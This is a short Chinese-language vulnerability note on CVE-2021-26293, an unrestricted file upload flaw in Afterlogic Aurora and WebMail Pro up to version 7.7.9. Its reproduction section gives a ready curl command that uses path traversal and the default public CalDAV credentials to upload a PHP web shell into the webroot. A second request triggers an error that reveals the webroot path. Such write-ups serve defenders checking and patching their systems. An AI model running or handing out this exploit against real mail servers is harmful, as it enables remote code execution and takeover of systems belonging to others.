Afterlogic-Aurora-&-WebMail-Pro-文件上传漏洞-CVE-2021-26293.md

Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293

漏洞描述

该漏洞是由于Afterlogic Aurora & WebMail Pro中对上传的文件过滤和限制存在缺陷，攻击者可以通过上传恶意文件，从而执行任意代码。

参考链接：

• http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26293
• https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26293-rce-via-public-unrestricted-file-upload-vulnerability.md
• https://forum.ywhack.com/thread-115325-1-8.html

漏洞影响

WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9

漏洞复现

curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"

默认路径为/var/www/html，也可能更改配置为其它路径，可以尝试其它方式获取。

curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
//使用无效路径获取SabreDAV错误查看Webroot路径